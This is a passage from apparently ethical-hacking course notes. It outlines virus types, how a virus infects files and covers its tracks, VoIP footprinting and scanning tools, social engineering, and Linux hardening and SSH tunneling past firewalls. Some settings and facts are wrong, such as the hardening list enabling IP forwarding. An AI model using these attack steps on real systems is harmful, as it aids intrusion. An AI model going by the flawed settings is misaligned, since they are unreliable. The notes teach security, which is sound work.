Boot Viruses

Program Viruses

Multipartite Viruses

Stealth Viruses

Polymorphic Viruses

Macro Viruses

Active X

FAT

COM Viruses

Virus Infection

STEP I- Finding file to infect

Efficiency in finding an file for infection or targeted for infection increases the performance of

viruses.

STEP II- Check Virus Infection Criteria

Check whether file and program should be infected or not.

STEP III- Check for previous Infection

Check whether the file is already infected or not.

STEP IV- Infect the File

Save the file attributes; Change the file attribute to nothing; Open the file in read/write mode; Run

virus routines.

STEP V- Covering Tracks

Restore file attributes to avoid detection.

Trigger Mechanism

Set a logical condition for activation of virus; Are of following types:

Counter Trigger

KeyStroke Trigger

Time Trigger

Replication Trigger

System Parameter Trigger

Null Trigger

12. MOBILE PHONE & VOIP HACKING

Introduction

Voice Over Internet Protocol (VOIP) refers to transmission of voice over IP based networks.

Also known as ―Packet Telephony‖. It uses IP protocol to route voice traffic. Voice is compressed

using CODECS hence bandwidth is utilized efficiently. Renowned for its low cost and

advantageous to customers in case of long distance calls.

VOIP Hacking Steps

Footprinting

Scanning

Enumeration

Exploiting the network

Footprinting

Public web site research; Google hacking; WHOIS & DNS analysis. Information includes:

Organizational Structure and corporate locations

Help & Tech Support

Job Listings

Domain name Lookup

Phone numbers and extensions

VoIP vendors press releases and case studies

Resumes

Mailing lists and local user group postings

Web based VoIP logins

Scanning

Collect an active target lists and figure out what devices are accessible on the network. Ping large

number of IP address and wait for any responses.

Methods to Ping:

ICMP ping sweeps

ARP pings

TCP ping scans

SNMP sweeps

Determine the vulnerabilities present on the target host or devices.

Method to scan active services:

TCP scan

UDP scan

Determine the type of devices, hosts by OS and firmware types.

Method to identify host/devices:

Stack Fingerpinting

Tools to be used:

Nmap

Xprobe2

Arkin

Queso

Snacktime

Enumeration

Extract user names using Win2k enumeration.

Gather information from the host using null sessions.

Perform windows enumeration using SuperScan4.

Get the users‘ account using GetAcct.

Perform an SNMP port scan using SNScanV1.05.

Exploiting the network

Launch various attacks based on vulnerability existing

Compromise an network node

Gain access to a network

Now access the network and start sniffing

Intercept through VoIP signaling Manipulation to insert Rouge Applications.

13. SOCIAL ENGINEERING

Social Engineering is the art of manipulation and the skill of exploiting human weakness. A social

engineering attack may occur over the phone, by e-mail, by a personal visit, or through the

computer. The intent of the attack is to acquire information, such as user IDs and passwords.

While these attacks may seem relatively low-tech, they target an organization‘s weakest link, its

employees.

Common Types of Social Engineering

Social engineering attacks can be divided into two categories:

Human Based

Computer Based

Human Based Impersonation

Human based attacks are relatively low-tech and are reminiscent of a scam or something you would

expect from a con man. The six primary types of human based social engineering are listed below:

Important User

Tech Support

Third Party Authorization

In Person

Dumpster Diving

Shoulder Surfing

Computer Based Impersonation

This type of social engineering attack attempts to use a computer as the interface. These attacks can

come in any of the following forms:

Mail Attachments

Popup Windows

Website Faking

SPAM

Social Engineering Prevention

Defense requires a good offense. Employees need to be made aware of social engineering attacks.

They must also be given procedures that can be used to verify an individual‘s identity. Training

and education must be continual to remind employees to protect valuable resources. The following

three steps can help protect your organization from this easy to launch, hard to prevent attack:

Policies and Procedures

Training

Employee Education

14. LINUX HACKING

Linux Basics

Linux is case sensitive

Linux filenames can contain maximum 256 characters

In Linux file extensions don‘t play big role and are not necessary

Its file system is hierarchical

In Linux we don‘t have any drive letters, instead they are recognized as /dev/sda1, /dev/sda2

Linux root directory is denoted by /

Nano, vi, vim, pico are common command line editors which are widely used

CP is command to copy a file

MV is command to move and rename a file

Mkdir is command to create a directory

Rmdir is command to remove empty directories

Rm is command to delete files and folders

Find is a command to find the files

In Linux we have three types of user

Root user, Service User, Normal User

Root user will always have uid:gid=0:0

Normal User will always have uid:gid starting from 500:500

Service Users uid:gid always exists between 0 – 500

Service user are not allowed to login by default where as root and normal user can login

User‘s User Id, Group Id, home directory and shell is allocated to them in the /etc/passwd file

Linux password are stored in MD5 hashes in /etc/shadow file

ARP is a command which is mostly used to for checking existing Ethernet connectivity and

IP address

Ipconfig is command line tool which checks all interface cards and shows information

regarding them

PS is a command which lists all existing process on the server

Route is a command which lists all routing tables for your server

Shred is a command which deletes a file securely by overwriting its contents

Why is Linux Hacked?

Linux is used on more than 80% of all web servers on internet. Finding vulnerability in such a

popular OS or its related applications for web servers would mean that you can virtually hack into

any website on the internet, depending upon the type of vulnerability. Linux users generally use no

antivirus program which makes it more difficult to detect if a Linux machine is compromised or

not. For servers a lot of rootkit scanners and software firewalls are available, however they are not

very easy to use and configure as Linux is not very user friendly for non technical people.

Recent Vulnerabilities

Kerberos Vulnerability-[USN-999-1]

LVM2 Vulnerability-[USN-1001-1]

Apache Vulnerability-[USN-990-2]

Dpkg Vulnerability-[USN-986-3]

Secure your Linux

Linux has lots of inbuilt processes to secure itself

/etc/sysctl.conf- sysctl.conf is used to alter the parameters of Linux Kernel to make it more

secure

Apply Following configuration

Net/ipv4/conf/all/rp_filter=1

Net/ipv4/conf/all/log_martians=1

Net/ipv4/conf/all/send_redirects=0

Net/ipv4/conf/all/accept_source_route=0

Net/ipv4/conf/all/accept_redirects=0

Net/ipv4/tcp_syncookies=1

Net/ipv4/icmp_echo_ignore_broadcast=1

Net/ipv4/ip_forward=1

Security Enhanced Linux (SELinux)

Security Enhanced Linux(SELinux) is a Linux feature that provides a mechanism for

supporting access control security policies

SELinux is a not a separate distribution in itself but a set of modifications which are applied

to Linux Kernel to make it more secure.

SELinux has been integrated into version 2.6 series of Linux Kernel and separate patches are

now unnecessary.

Backtrack

BackTrack is a Linux distribution as the world‘s most popular security distribution for

penetration testing and vulnerability assessment.

The BackTrack distribution originated from the merger of two formerely competing

distributions which focused on penetration testing.

WHAX: a SLAX based Linux distribution.

Auditor Security Collection: a Live CD based on Knoppix.

The overlap with Auditor and WHAX in purpose tools collection partly led to merger.

Patch Management

Patch Management is a part of the job role of system administrator. The task involves

applying and Testing multiple patches on the available computer systems. Patch Management

tasks include

Maintaining the set of available patches from the vendor

Deciding what patches necessary to apply first on the their nature as critical or optional

Ensuring that patches are successfully installed

And testing the system for stability after installation

There are lot of automated tools available in the market to automate this process including

the RingMaster‘s Automated Patch Management and Gilbrator‘s Everguard.

SSH Connection

SSH is a protocol which enables remote administration of computers over encrypted

connections. An SSH client is used to log in to remote machine and allows the execution of

commands on that machine.

RSH and Telnet also allow remote administration of computers in a similar way like SSH

but these protocols are insecure and transfer data in plain text over the network.

SSH and Openssh for Linux and putty for windows can be used as a SSH client, to

communicate with SSH server.

SSH Tunneling

SSH Tunneling can be used to bypass the security restriction imposed by a proxy server and

firewall on a network. During tunneling the SSH client would be used to send the data meant

for other protocols such as SMB or HTTP.

For SSH tunneling we will be requiring two machines. One inside the restricted network and

the other outside the network. The system outside the restricted network should be

configured as a server and the system inside the restricted network should be configured as

SSH client.

Eg We have a situation where port 22 is open in restricted network and all the other services

like FTP, HTTP & SMTP are blocked. Here in this scenario we can use SSH tunneling to

browse the normal internet by using a SSH server as a proxy which fetches the web pages for

my client and send me the data wrapped in SSH protocol which is allowed in the network.

SSH Tunneling can also be used to transfer unencrypted network traffic between the SSH

client and Server.

Advantages of Linux

COST- Being a open source project as it comes under GNU general public license. Cost is

the major factor why Linux is used in more than 80% servers throughout the world.

SECURITY- Linux is also considered as more secure application than windows as most of

the malware actually target windows based computers. Linux has better user permissions

model which makes it more secure.

STABILITY- Linux is quite stable in comparison to windows.

Disadvantages of Linux

Due to being open source, Linux source code or its associated applications source codes are

easily available which makes it easier to discover security vulnerabilities and flaw. They can

be exploited in the wild by the hackers.

HARDWARE COMPATIBILITY ISSUE- Linux does not support latest hardware in some

cases due to which it becomes very uncomfortable for a normal desktop user to use Linux as

a main OS over windows.

Linux is not very easy to use for normal people as it requires extensive knowledge of

operating and networking to use it comfortably. So, it can be a bit Hassle for a non technical

person.